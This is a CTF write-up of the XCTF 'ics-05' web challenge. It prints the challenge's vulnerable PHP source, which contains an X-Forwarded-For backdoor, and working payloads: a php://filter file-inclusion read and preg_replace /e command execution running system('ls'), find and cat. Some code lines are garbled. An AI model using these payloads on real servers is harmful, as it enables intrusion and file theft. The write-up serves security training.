[XCTF/Network Security] Attack and Defense World ics-05 Problem Solving Analysis
var code = “d3c47923-3948-4ce3-b432-0489790c1b14”
Title description: Other saboteurs will use the back door of the equipment maintenance center of the industrial control cloud management system to invade the system
According to the prompt, enter the maintenance center page
View the source code to find the injection point
content injection
Payload:?page={
{4*5}}
If the requested URL is 4*5
, what is actually passed to the server is a string 4*5
, and no expression evaluation is performed.
In the case of ?page={ {4*5}}, since the URL contains double braces { {}}, the server side will evaluate the expression in it.
As shown above, there is no echo.
PHP pseudo-protocol
Try PHP pseudo-protocol, Payload:
?page=php://filter/read=convert.base64-encode/resource=index.php
The echo is as follows:
decoding:
<?php
error_reporting(0);
@session_start();
posix_setuid(1000);
?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="stylesheet" href="layui/css/layui.css" media="all">
<title>设备维护中心</title>
<meta charset="utf-8">
</head>
<body>
<ul class="layui-nav">
<li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
<legend>设备列表</legend>
</fieldset>
<table class="layui-hide" id="test"></table>
<script type="text/html" id="switchTpl">
<!-- 这里的 checked 的状态只是演示 -->
<input type="checkbox" name="sex" value="{
{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {
{
d.id==1 0003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
var table = layui.table,
form = layui.form;
table.render({
elem: '#test',
url: '/somrthing.json',
cellMinWidth: 80,
cols: [
[
{
type: 'numbers' },
{
type: 'checkbox' },
{
field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
{
field: 'name', title: '设备名', templet: '#nameTpl' },
{
field: 'area', title: '区域' },
{
field: 'status', title: '维护状态', minWidth: 120, sort: true },
{
field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
]
],
page: true
});
});
</script>
<script>
layui.use('element', function() {
var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
//监听导航点击
element.on('nav(demo)', function(elem) {
//console.log(elem)
layer.msg(elem.text());
});
});
</script>
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead">
<?php
if (strpos($page, 'input') > 0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page);
die();
?>
</p>
<br /><br /><br /><br />
<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
</body>
</html>
code audit
The key code is as follows:
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
//page参数只能包含数字或字母
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?>
//若page参数为数字或字母,则输出page页面内容
?>
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
//将subject里的pattern变为replacement
}else{
die();
}
}
Here is a simple example of string replacement using the preg_replace() function:
<?php
// 替换字符串中的空格和逗号为冒号
$string = "apple, banana, kiwi, orange";
$pattern = '/[\s,]+/';
$replacement = ':';
$new_string = preg_replace($pattern, $replacement, $string);
echo $new_string; // 输出 "apple:banana:kiwi:orange"
?>
method one
Capture packets, modify XFF
Specific method reference: [CTF/Network Security] Attack and Defense World xff_referer Detailed Analysis of Problem Solving
/e modifier
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码
subject和pattern满足该函数下的规则即可,无特殊要求。
The Payload is constructed as follows, and the sub is qiu
replaced system('find -name *flag*')
by to execute the command
?pat=/qiu/e&rep=system('find -name *flag*')&sub=qiu
//在当前目录及子目录中查找文件名中包含flag的文件
Method Two
Capture packets, modify XFF
column directory
?pat=/qiu/e&rep=system('ls')&sub=qiu
The echo is as follows:
view directory contents
?pat=/qiu/e&rep=system('ls+目录')&sub=qiu
The echo is as follows:
view folder contents
?pat=/qiu/e&rep=system('ls+目录/文件夹名')&sub=qiu
The echo is as follows:
view file content
?pat=/qiu/e&rep=system('cat+目录/文件夹名/文件名')&sub=qiu
Other common payloads
List the files and subdirectories under the /var/www/html directory:
?pat=/qiu/e&rep=system('ls /var/www/html')&sub=qiu
Find files containing xx in the file name in the current directory and its subdirectories, such as 1xx.txt
or xx2023qiu.jpg
etc.:
?pat=/qiu/e&rep=system('find -name *xx*')&sub=qiu
Summarize
Relevant knowledge of the subject investigation XFF
and . I am Qiu said , see you next time./e修正符